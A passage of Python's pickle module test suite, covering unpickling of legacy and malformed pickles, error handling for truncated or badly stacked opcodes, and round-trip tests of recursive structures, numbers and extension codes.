self.assertEqual(self.loads(b'V\\u03c0\n.',
encoding='bytes'), 'π')
# From Python 2: pickle.dumps(u'π', protocol=1)
self.assertEqual(self.loads(b'X\x02\x00\x00\x00\xcf\x80.',
encoding="bytes"), 'π')
# From Python 2: pickle.dumps(u'π', protocol=2)
self.assertEqual(self.loads(b'\x80\x02X\x02\x00\x00\x00\xcf\x80.',
encoding="bytes"), 'π')
def test_load_long_python2_str_as_bytes(self):
# From Python 2: pickle.dumps('x' * 300, protocol=1)
self.assertEqual(self.loads(pickle.BINSTRING +
struct.pack("<I", 300) +
b'x' * 300 + pickle.STOP,
encoding='bytes'), b'x' * 300)
def test_constants(self):
self.assertIsNone(self.loads(b'N.'))
self.assertIs(self.loads(b'\x88.'), True)
self.assertIs(self.loads(b'\x89.'), False)
self.assertIs(self.loads(b'I01\n.'), True)
self.assertIs(self.loads(b'I00\n.'), False)
def test_empty_bytestring(self):
# issue 11286
empty = self.loads(b'\x80\x03U\x00q\x00.', encoding='koi8-r')
self.assertEqual(empty, '')
def test_short_binbytes(self):
dumped = b'\x80\x03C\x04\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
def test_binbytes(self):
dumped = b'\x80\x03B\x04\x00\x00\x00\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
@requires_32b
def test_negative_32b_binbytes(self):
# On 32-bit builds, a BINBYTES of 2**31 or more is refused
dumped = b'\x80\x03B\xff\xff\xff\xffxyzq\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_negative_32b_binunicode(self):
# On 32-bit builds, a BINUNICODE of 2**31 or more is refused
dumped = b'\x80\x03X\xff\xff\xff\xffxyzq\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
def test_short_binunicode(self):
dumped = b'\x80\x04\x8c\x04\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), '\u20ac\x00')
def test_misc_get(self):
self.check_unpickling_error(pickle.UnpicklingError, b'g0\np0')
self.check_unpickling_error(pickle.UnpicklingError, b'jens:')
self.check_unpickling_error(pickle.UnpicklingError, b'hens:')
self.assert_is_copy([(100,), (100,)],
self.loads(b'((Kdtp0\nh\x00l.))'))
def test_binbytes8(self):
dumped = b'\x80\x04\x8e\4\0\0\0\0\0\0\0\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
def test_binunicode8(self):
dumped = b'\x80\x04\x8d\4\0\0\0\0\0\0\0\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), '\u20ac\x00')
def test_bytearray8(self):
dumped = b'\x80\x05\x96\x03\x00\x00\x00\x00\x00\x00\x00xxx.'
self.assertEqual(self.loads(dumped), bytearray(b'xxx'))
@requires_32b
def test_large_32b_binbytes8(self):
dumped = b'\x80\x04\x8e\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_large_32b_bytearray8(self):
dumped = b'\x80\x05\x96\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_large_32b_binunicode8(self):
dumped = b'\x80\x04\x8d\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
def test_get(self):
pickled = b'((lp100000\ng100000\nt.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_binget(self):
pickled = b'(]q\xffh\xfft.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_long_binget(self):
pickled = b'(]r\x00\x00\x01\x00j\x00\x00\x01\x00t.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_dup(self):
pickled = b'((l2t.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_negative_put(self):
# Issue #12847
dumped = b'Va\np-1\n.'
self.check_unpickling_error(ValueError, dumped)
@requires_32b
def test_negative_32b_binput(self):
# Issue #12847
dumped = b'\x80\x03X\x01\x00\x00\x00ar\xff\xff\xff\xff.'
self.check_unpickling_error(ValueError, dumped)
def test_badly_escaped_string(self):
self.check_unpickling_error(ValueError, b"S'\\'\n.")
def test_badly_quoted_string(self):
# Issue #17710
badpickles = [b"S'\n.",
b'S"\n.',
b'S\' \n.',
b'S" \n.',
b'S\'"\n.',
b'S"\'\n.',
b"S' ' \n.",
b'S" " \n.',
b"S ''\n.",
b'S ""\n.',
b'S \n.',
b'S\n.',
b'S.']
for p in badpickles:
self.check_unpickling_error(pickle.UnpicklingError, p)
def test_correctly_quoted_string(self):
goodpickles = [(b"S''\n.", ''),
(b'S""\n.', ''),
(b'S"\\n"\n.', '\n'),
(b"S'\\n'\n.", '\n')]
for p, expected in goodpickles:
self.assertEqual(self.loads(p), expected)
def test_frame_readline(self):
pickled = b'\x80\x04\x95\x05\x00\x00\x00\x00\x00\x00\x00I42\n.'
# 0: \x80 PROTO 4
# 2: \x95 FRAME 5
# 11: I INT 42
# 15: . STOP
self.assertEqual(self.loads(pickled), 42)
def test_compat_unpickle(self):
# xrange(1, 7)
pickled = b'\x80\x02c__builtin__\nxrange\nK\x01K\x07K\x01\x87R.'
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), range)
self.assertEqual(unpickled, range(1, 7))
self.assertEqual(list(unpickled), [1, 2, 3, 4, 5, 6])
# reduce
pickled = b'\x80\x02c__builtin__\nreduce\n.'
self.assertIs(self.loads(pickled), functools.reduce)
# whichdb.whichdb
pickled = b'\x80\x02cwhichdb\nwhichdb\n.'
self.assertIs(self.loads(pickled), dbm.whichdb)
# Exception(), StandardError()
for name in (b'Exception', b'StandardError'):
pickled = (b'\x80\x02cexceptions\n' + name + b'\nU\x03ugh\x85R.')
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), Exception)
self.assertEqual(str(unpickled), 'ugh')
# UserDict.UserDict({1: 2}), UserDict.IterableUserDict({1: 2})
for name in (b'UserDict', b'IterableUserDict'):
pickled = (b'\x80\x02(cUserDict\n' + name +
b'\no}U\x04data}K\x01K\x02ssb.')
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), collections.UserDict)
self.assertEqual(unpickled, collections.UserDict({1: 2}))
def test_bad_stack(self):
badpickles = [
b'.', # STOP
b'0', # POP
b'1', # POP_MARK
b'2', # DUP
b'(2',
b'R', # REDUCE
b')R',
b'a', # APPEND
b'Na',
b'b', # BUILD
b'Nb',
b'd', # DICT
b'e', # APPENDS
b'(e',
b'ibuiltins\nlist\n', # INST
b'l', # LIST
b'o', # OBJ
b'(o',
b'p1\n', # PUT
b'q\x00', # BINPUT
b'r\x00\x00\x00\x00', # LONG_BINPUT
b's', # SETITEM
b'Ns',
b'NNs',
b't', # TUPLE
b'u', # SETITEMS
b'(u',
b'}(Nu',
b'\x81', # NEWOBJ
b')\x81',
b'\x85', # TUPLE1
b'\x86', # TUPLE2
b'N\x86',
b'\x87', # TUPLE3
b'N\x87',
b'NN\x87',
b'\x90', # ADDITEMS
b'(\x90',
b'\x91', # FROZENSET
b'\x92', # NEWOBJ_EX
b')}\x92',
b'\x93', # STACK_GLOBAL
b'Vlist\n\x93',
b'\x94', # MEMOIZE
]
for p in badpickles:
self.check_unpickling_error(self.bad_stack_errors, p)
def test_bad_mark(self):
badpickles = [
b'N(.', # STOP
b'N(2', # DUP
b'cbuiltins\nlist\n)(R', # REDUCE
b'cbuiltins\nlist\n()R',
b']N(a', # APPEND
# BUILD
b'cbuiltins\nValueError\n)R}(b',
b'cbuiltins\nValueError\n)R(}b',
b'(Nd', # DICT
b'N(p1\n', # PUT
b'N(q\x00', # BINPUT
b'N(r\x00\x00\x00\x00', # LONG_BINPUT
b'}NN(s', # SETITEM
b'}N(Ns',
b'}(NNs',
b'}((u', # SETITEMS
b'cbuiltins\nlist\n)(\x81', # NEWOBJ
b'cbuiltins\nlist\n()\x81',
b'N(\x85', # TUPLE1
b'NN(\x86', # TUPLE2
b'N(N\x86',
b'NNN(\x87', # TUPLE3
b'NN(N\x87',
b'N(NN\x87',
b']((\x90', # ADDITEMS
# NEWOBJ_EX
b'cbuiltins\nlist\n)}(\x92',
b'cbuiltins\nlist\n)(}\x92',
b'cbuiltins\nlist\n()}\x92',
# STACK_GLOBAL
b'Vbuiltins\n(Vlist\n\x93',
b'Vbuiltins\nVlist\n(\x93',
b'N(\x94', # MEMOIZE
]
for p in badpickles:
self.check_unpickling_error(self.bad_stack_errors, p)
def test_truncated_data(self):
self.check_unpickling_error(EOFError, b'')
self.check_unpickling_error(EOFError, b'N')
badpickles = [
b'B', # BINBYTES
b'B\x03\x00\x00',
b'B\x03\x00\x00\x00',
b'B\x03\x00\x00\x00ab',
b'C', # SHORT_BINBYTES
b'C\x03',
b'C\x03ab',
b'F', # FLOAT
b'F0.0',
b'F0.00',
b'G', # BINFLOAT
b'G\x00\x00\x00\x00\x00\x00\x00',
b'I', # INT
b'I0',
b'J', # BININT
b'J\x00\x00\x00',
b'K', # BININT1
b'L', # LONG
b'L0',
b'L10',
b'L0L',
b'L10L',
b'M', # BININT2
b'M\x00',
# b'P', # PERSID
# b'Pabc',
b'S', # STRING
b"S'abc'",
b'T', # BINSTRING
b'T\x03\x00\x00',
b'T\x03\x00\x00\x00',
b'T\x03\x00\x00\x00ab',
b'U', # SHORT_BINSTRING
b'U\x03',
b'U\x03ab',
b'V', # UNICODE
b'Vabc',
b'X', # BINUNICODE
b'X\x03\x00\x00',
b'X\x03\x00\x00\x00',
b'X\x03\x00\x00\x00ab',
b'(c', # GLOBAL
b'(cbuiltins',
b'(cbuiltins\n',
b'(cbuiltins\nlist',
b'Ng', # GET
b'Ng0',
b'(i', # INST
b'(ibuiltins',
b'(ibuiltins\n',
b'(ibuiltins\nlist',
b'Nh', # BINGET
b'Nj', # LONG_BINGET
b'Nj\x00\x00\x00',
b'Np', # PUT
b'Np0',
b'Nq', # BINPUT
b'Nr', # LONG_BINPUT
b'Nr\x00\x00\x00',
b'\x80', # PROTO
b'\x82', # EXT1
b'\x83', # EXT2
b'\x84\x01',
b'\x84', # EXT4
b'\x84\x01\x00\x00',
b'\x8a', # LONG1
b'\x8b', # LONG4
b'\x8b\x00\x00\x00',
b'\x8c', # SHORT_BINUNICODE
b'\x8c\x03',
b'\x8c\x03ab',
b'\x8d', # BINUNICODE8
b'\x8d\x03\x00\x00\x00\x00\x00\x00',
b'\x8d\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x8d\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x8e', # BINBYTES8
b'\x8e\x03\x00\x00\x00\x00\x00\x00',
b'\x8e\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x8e\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x96', # BYTEARRAY8
b'\x96\x03\x00\x00\x00\x00\x00\x00',
b'\x96\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x96\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x95', # FRAME
b'\x95\x02\x00\x00\x00\x00\x00\x00',
b'\x95\x02\x00\x00\x00\x00\x00\x00\x00',
b'\x95\x02\x00\x00\x00\x00\x00\x00\x00N',
]
for p in badpickles:
self.check_unpickling_error(self.truncated_errors, p)
@threading_helper.reap_threads
def test_unpickle_module_race(self):
# https://bugs.python.org/issue34572
locker_module = dedent("""
import threading
barrier = threading.Barrier(2)
""")
locking_import_module = dedent("""
import locker
locker.barrier.wait()
class ToBeUnpickled(object):
pass
""")
os.mkdir(TESTFN)
self.addCleanup(shutil.rmtree, TESTFN)
sys.path.insert(0, TESTFN)
self.addCleanup(sys.path.remove, TESTFN)
with open(os.path.join(TESTFN, "locker.py"), "wb") as f:
f.write(locker_module.encode('utf-8'))
with open(os.path.join(TESTFN, "locking_import.py"), "wb") as f:
f.write(locking_import_module.encode('utf-8'))
self.addCleanup(forget, "locker")
self.addCleanup(forget, "locking_import")
import locker
pickle_bytes = (
b'\x80\x03clocking_import\nToBeUnpickled\nq\x00)\x81q\x01.')
# Then try to unpickle two of these simultaneously
# One of them will cause the module import, and we want it to block
# until the other one either:
# - fails (before the patch for this issue)
# - blocks on the import lock for the module, as it should
results = []
barrier = threading.Barrier(3)
def t():
# This ensures the threads have all started
# presumably barrier release is faster than thread startup
barrier.wait()
results.append(pickle.loads(pickle_bytes))
t1 = threading.Thread(target=t)
t2 = threading.Thread(target=t)
t1.start()
t2.start()
barrier.wait()
# could have delay here
locker.barrier.wait()
t1.join()
t2.join()
from locking_import import ToBeUnpickled
self.assertEqual(
[type(x) for x in results],
[ToBeUnpickled] * 2)
class AbstractPickleTests(unittest.TestCase):
# Subclass must define self.dumps, self.loads.
optimized = False
_testdata = AbstractUnpickleTests._testdata
def setUp(self):
pass
assert_is_copy = AbstractUnpickleTests.assert_is_copy
def test_misc(self):
# test various datatypes not tested by testdata
for proto in protocols:
x = myint(4)
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
x = (1, ())
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
x = initarg(1, x)
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
# XXX test __reduce__ protocol?
def test_roundtrip_equality(self):
expected = self._testdata
for proto in protocols:
s = self.dumps(expected, proto)
got = self.loads(s)
self.assert_is_copy(expected, got)
# There are gratuitous differences between pickles produced by
# pickle and cPickle, largely because cPickle starts PUT indices at
# 1 and pickle starts them at 0. See XXX comment in cPickle's put2() --
# there's a comment with an exclamation point there whose meaning
# is a mystery. cPickle also suppresses PUT for objects with a refcount
# of 1.
def dont_test_disassembly(self):
from io import StringIO
from pickletools import dis
for proto, expected in (0, DATA0_DIS), (1, DATA1_DIS):
s = self.dumps(self._testdata, proto)
filelike = StringIO()
dis(s, out=filelike)
got = filelike.getvalue()
self.assertEqual(expected, got)
def test_recursive_list(self):
l = []
l.append(l)
for proto in protocols:
s = self.dumps(l, proto)
x = self.loads(s)
self.assertIsInstance(x, list)
self.assertEqual(len(x), 1)
self.assertIs(x[0], x)
def test_recursive_tuple_and_list(self):
t = ([],)
t[0].append(t)
for proto in protocols:
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], list)
self.assertEqual(len(x[0]), 1)
self.assertIs(x[0][0], x)
def test_recursive_dict(self):
d = {}
d[1] = d
for proto in protocols:
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, dict)
self.assertEqual(list(x.keys()), [1])
self.assertIs(x[1], x)
def test_recursive_dict_key(self):
d = {}
k = K(d)
d[k] = 1
for proto in protocols:
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, dict)
self.assertEqual(len(x.keys()), 1)
self.assertIsInstance(list(x.keys())[0], K)
self.assertIs(list(x.keys())[0].value, x)
def test_recursive_set(self):
y = set()
k = K(y)
y.add(k)
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, set)
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], K)
self.assertIs(list(x)[0].value, x)
def test_recursive_list_subclass(self):
y = MyList()
y.append(y)
for proto in range(2, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, MyList)
self.assertEqual(len(x), 1)
self.assertIs(x[0], x)
def test_recursive_dict_subclass(self):
d = MyDict()
d[1] = d
for proto in range(2, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, MyDict)
self.assertEqual(list(x.keys()), [1])
self.assertIs(x[1], x)
def test_recursive_dict_subclass_key(self):
d = MyDict()
k = K(d)
d[k] = 1
for proto in range(2, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, MyDict)
self.assertEqual(len(list(x.keys())), 1)
self.assertIsInstance(list(x.keys())[0], K)
self.assertIs(list(x.keys())[0].value, x)
def test_recursive_inst(self):
i = C()
i.attr = i
for proto in protocols:
s = self.dumps(i, proto)
x = self.loads(s)
self.assertIsInstance(x, C)
self.assertEqual(dir(x), dir(i))
self.assertIs(x.attr, x)
def test_recursive_multi(self):
l = []
d = {1:l}
i = C()
i.attr = d
l.append(i)
for proto in protocols:
s = self.dumps(l, proto)
x = self.loads(s)
self.assertIsInstance(x, list)
self.assertEqual(len(x), 1)
self.assertEqual(dir(x[0]), dir(i))
self.assertEqual(list(x[0].attr.keys()), [1])
self.assertTrue(x[0].attr[1] is x)
def check_recursive_collection_and_inst(self, factory):
h = H()
y = factory([h])
h.attr = y
for proto in protocols:
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, type(y))
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], H)
self.assertIs(list(x)[0].attr, x)
def test_recursive_list_and_inst(self):
self.check_recursive_collection_and_inst(list)
def test_recursive_tuple_and_inst(self):
self.check_recursive_collection_and_inst(tuple)
def test_recursive_dict_and_inst(self):
self.check_recursive_collection_and_inst(dict.fromkeys)
def test_recursive_set_and_inst(self):
self.check_recursive_collection_and_inst(set)
def test_recursive_frozenset_and_inst(self):
self.check_recursive_collection_and_inst(frozenset)
def test_recursive_list_subclass_and_inst(self):
self.check_recursive_collection_and_inst(MyList)
def test_recursive_tuple_subclass_and_inst(self):
self.check_recursive_collection_and_inst(MyTuple)
def test_recursive_dict_subclass_and_inst(self):
self.check_recursive_collection_and_inst(MyDict.fromkeys)
def test_recursive_set_subclass_and_inst(self):
self.check_recursive_collection_and_inst(MySet)
def test_recursive_frozenset_subclass_and_inst(self):
self.check_recursive_collection_and_inst(MyFrozenSet)
def test_unicode(self):
endcases = ['', '<\\u>', '<\\\u1234>', '<\n>',
'<\\>', '<\\\U00012345>',
# surrogates
'<\udc80>']
for proto in protocols:
for u in endcases:
p = self.dumps(u, proto)
u2 = self.loads(p)
self.assert_is_copy(u, u2)
def test_unicode_high_plane(self):
t = '\U00012345'
for proto in protocols:
p = self.dumps(t, proto)
t2 = self.loads(p)
self.assert_is_copy(t, t2)
def test_bytes(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
for s in [bytes([i]) for i in range(256)]:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
for s in [bytes([i, i]) for i in range(256)]:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
def test_bytearray(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
b = bytearray(s)
p = self.dumps(b, proto)
bb = self.loads(p)
self.assertIsNot(bb, b)
self.assert_is_copy(b, bb)
if proto <= 3:
# bytearray is serialized using a global reference
self.assertIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.GLOBAL, p))
elif proto == 4:
self.assertIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.STACK_GLOBAL, p))
elif proto == 5:
self.assertNotIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.BYTEARRAY8, p))
def test_ints(self):
for proto in protocols:
n = sys.maxsize
while n:
for expected in (-n, n):
s = self.dumps(expected, proto)
n2 = self.loads(s)
self.assert_is_copy(expected, n2)
n = n >> 1
def test_long(self):
for proto in protocols:
# 256 bytes is where LONG4 begins.
for nbits in 1, 8, 8*254, 8*255, 8*256, 8*257:
nbase = 1 << nbits
for npos in nbase-1, nbase, nbase+1:
for n in npos, -npos:
pickle = self.dumps(n, proto)
got = self.loads(pickle)
self.assert_is_copy(n, got)
# Try a monster. This is quadratic-time in protos 0 & 1, so don't
# bother with those.
nbase = int("deadbeeffeedface", 16)
nbase += nbase << 1000000
for n in nbase, -nbase:
p = self.dumps(n, 2)
got = self.loads(p)
# assert_is_copy is very expensive here as it precomputes
# a failure message by computing the repr() of n and got,
# we just do the check ourselves.
self.assertIs(type(got), int)
self.assertEqual(n, got)
def test_float(self):
test_values = [0.0, 4.94e-324, 1e-310, 7e-308, 6.626e-34, 0.1, 0.5,
3.14, 263.44582062374053, 6.022e23, 1e30]
test_values = test_values + [-x for x in test_values]
for proto in protocols:
for value in test_values:
pickle = self.dumps(value, proto)
got = self.loads(pickle)
self.assert_is_copy(value, got)
@run_with_locale('LC_ALL', 'de_DE', 'fr_FR')
def test_float_format(self):
# make sure that floats are formatted locale independent with proto 0
self.assertEqual(self.dumps(1.2, 0)[0:3], b'F1.')
def test_reduce(self):
for proto in protocols:
inst = AAA()
dumped = self.dumps(inst, proto)
loaded = self.loads(dumped)
self.assertEqual(loaded, REDUCE_A)
def test_getinitargs(self):
for proto in protocols:
inst = initarg(1, 2)
dumped = self.dumps(inst, proto)
loaded = self.loads(dumped)
self.assert_is_copy(inst, loaded)
def test_metaclass(self):
a = use_metaclass()
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a.__class__, b.__class__)
def test_dynamic_class(self):
a = create_dynamic_class("my_dynamic_class", (object,))
copyreg.pickle(pickling_metaclass, pickling_metaclass.__reduce__)
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a, b)
self.assertIs(type(a), type(b))
def test_structseq(self):
import time
import os
t = time.localtime()
for proto in protocols:
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
t = os.stat(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
if hasattr(os, "statvfs"):
t = os.statvfs(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
def test_ellipsis(self):
for proto in protocols:
s = self.dumps(..., proto)
u = self.loads(s)
self.assertIs(..., u)
def test_notimplemented(self):
for proto in protocols:
s = self.dumps(NotImplemented, proto)
u = self.loads(s)
self.assertIs(NotImplemented, u)
def test_singleton_types(self):
# Issue #6477: Test that types of built-in singletons can be pickled.
singletons = [None, ..., NotImplemented]
for singleton in singletons:
for proto in protocols:
s = self.dumps(type(singleton), proto)
u = self.loads(s)
self.assertIs(type(singleton), u)
# Tests for protocol 2
def test_proto(self):
for proto in protocols:
pickled = self.dumps(None, proto)
if proto >= 2:
proto_header = pickle.PROTO + bytes([proto])
self.assertTrue(pickled.startswith(proto_header))
else:
self.assertEqual(count_opcode(pickle.PROTO, pickled), 0)
oob = protocols[-1] + 1 # a future protocol
build_none = pickle.NONE + pickle.STOP
badpickle = pickle.PROTO + bytes([oob]) + build_none
try:
self.loads(badpickle)
except ValueError as err:
self.assertIn("unsupported pickle protocol", str(err))
else:
self.fail("expected bad protocol number to raise ValueError")
def test_long1(self):
x = 12345678910111213141516178920
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG1, s), proto >= 2)
def test_long4(self):
x = 12345678910111213141516178920 << (256*8)
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG4, s), proto >= 2)
def test_short_tuples(self):
# Map (proto, len(tuple)) to expected opcode.
expected_opcode = {(0, 0): pickle.TUPLE,
(0, 1): pickle.TUPLE,
(0, 2): pickle.TUPLE,
(0, 3): pickle.TUPLE,
(0, 4): pickle.TUPLE,
(1, 0): pickle.EMPTY_TUPLE,
(1, 1): pickle.TUPLE,
(1, 2): pickle.TUPLE,
(1, 3): pickle.TUPLE,
(1, 4): pickle.TUPLE,
(2, 0): pickle.EMPTY_TUPLE,
(2, 1): pickle.TUPLE1,
(2, 2): pickle.TUPLE2,
(2, 3): pickle.TUPLE3,
(2, 4): pickle.TUPLE,
(3, 0): pickle.EMPTY_TUPLE,
(3, 1): pickle.TUPLE1,
(3, 2): pickle.TUPLE2,
(3, 3): pickle.TUPLE3,
(3, 4): pickle.TUPLE,
}
a = ()
b = (1,)
c = (1, 2)
d = (1, 2, 3)
e = (1, 2, 3, 4)
for proto in protocols:
for x in a, b, c, d, e:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
expected = expected_opcode[min(proto, 3), len(x)]
self.assertTrue(opcode_in_pickle(expected, s))
def test_singletons(self):
# Map (proto, singleton) to expected opcode.
expected_opcode = {(0, None): pickle.NONE,
(1, None): pickle.NONE,
(2, None): pickle.NONE,
(3, None): pickle.NONE,
(0, True): pickle.INT,
(1, True): pickle.INT,
(2, True): pickle.NEWTRUE,
(3, True): pickle.NEWTRUE,
(0, False): pickle.INT,
(1, False): pickle.INT,
(2, False): pickle.NEWFALSE,
(3, False): pickle.NEWFALSE,
}
for proto in protocols:
for x in None, False, True:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertTrue(x is y, (proto, x, s, y))
expected = expected_opcode[min(proto, 3), x]
self.assertTrue(opcode_in_pickle(expected, s))
def test_newobj_tuple(self):
x = MyTuple([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_newobj_list(self):
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_newobj_generic(self):
for proto in protocols:
for C in myclasses:
B = C.__base__
x = C(C.sample)
x.foo = 42
s = self.dumps(x, proto)
y = self.loads(s)
detail = (proto, C, B, x, y, type(y))
self.assert_is_copy(x, y) # XXX revisit
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
def test_newobj_proxies(self):
# NEWOBJ should use the __class__ rather than the raw type
classes = myclasses[:]
# Cannot create weakproxies to these classes
for c in (MyInt, MyTuple):
classes.remove(c)
for proto in protocols:
for C in classes:
B = C.__base__
x = C(C.sample)
x.foo = 42
p = weakref.proxy(x)
s = self.dumps(p, proto)
y = self.loads(s)
self.assertEqual(type(y), type(x)) # rather than type(p)
detail = (proto, C, B, x, y, type(y))
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
def test_newobj_not_class(self):
# Issue 24552
global SimpleNewObj
save = SimpleNewObj
o = SimpleNewObj.__new__(SimpleNewObj)
b = self.dumps(o, 4)
try:
SimpleNewObj = 42
self.assertRaises((TypeError, pickle.UnpicklingError), self.loads, b)
finally:
SimpleNewObj = save
# Register a type with copyreg, with extension code extcode. Pickle
# an object of that type. Check that the resulting pickle uses opcode
# (EXT[124]) under proto 2, and not in proto 1.
def produce_global_ext(self, extcode, opcode):
e = ExtensionSaver(extcode)
try:
copyreg.add_extension(__name__, "MyList", extcode)
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
# Dump using protocol 1 for comparison.
s1 = self.dumps(x, 1)
self.assertIn(__name__.encode("utf-8"), s1)
self.assertIn(b"MyList", s1)
self.assertFalse(opcode_in_pickle(opcode, s1))
y = self.loads(s1)
self.assert_is_copy(x, y)
# Dump using protocol 2 for test.
s2 = self.dumps(x, 2)
self.assertNotIn(__name__.encode("utf-8"), s2)
self.assertNotIn(b"MyList", s2)
self.assertEqual(opcode_in_pickle(opcode, s2), True, repr(s2))
y = self.loads(s2)
self.assert_is_copy(x, y)
finally:
e.restore()
def test_global_ext1(self):
self.produce_global_ext(0x00000001, pickle.EXT1) # smallest EXT1 code
self.produce_global_ext(0x000000ff, pickle.EXT1) # largest EXT1 code
def test_global_ext2(self):
self.produce_global_ext(0x00000100, pickle.EXT2) # smallest EXT2 code
self.produce_global_ext(0x0000ffff, pickle.EXT2) # largest EXT2 code
self.produce_global_ext(0x0000abcd, pickle.EXT2) # check endianness
def test_global_ext4(self):
self.produce_global_ext(0x00010000, pickle.EXT4) # smallest EXT4 code
self.produce_global_ext(0x7fffffff, pickle.EXT4) # largest EXT4 code
self.produce_global_ext(0x12abcdef, pickle.EXT4) # check endianness
def test_list_chunking(self):
n = 10 # too small to chunk
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
self.assertEqual(num_appends, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
if proto == 0:
self.assertEqual(num_appends, 0)
else:
self.assertTrue(num_appends >= 2)
def test_dict_chunking(self):
n = 10 # too small to chunk
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
self.assertIsInstance(s, bytes_types)
y = self.loads(s)
self.assert_is_copy(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
self.assertEqual(num_setitems, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
if proto == 0:
self.assertEqual(num_setitems, 0)
else:
self.assertTrue(num_setitems >= 2)
def test_set_chunking(self):
n = 10 # too small to chunk
x = set(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_additems = count_opcode(pickle.ADDITEMS, s)
if proto < 4:
self.assertEqual(num_additems, 0)
else:
self.assertEqual(num_additems, 1)
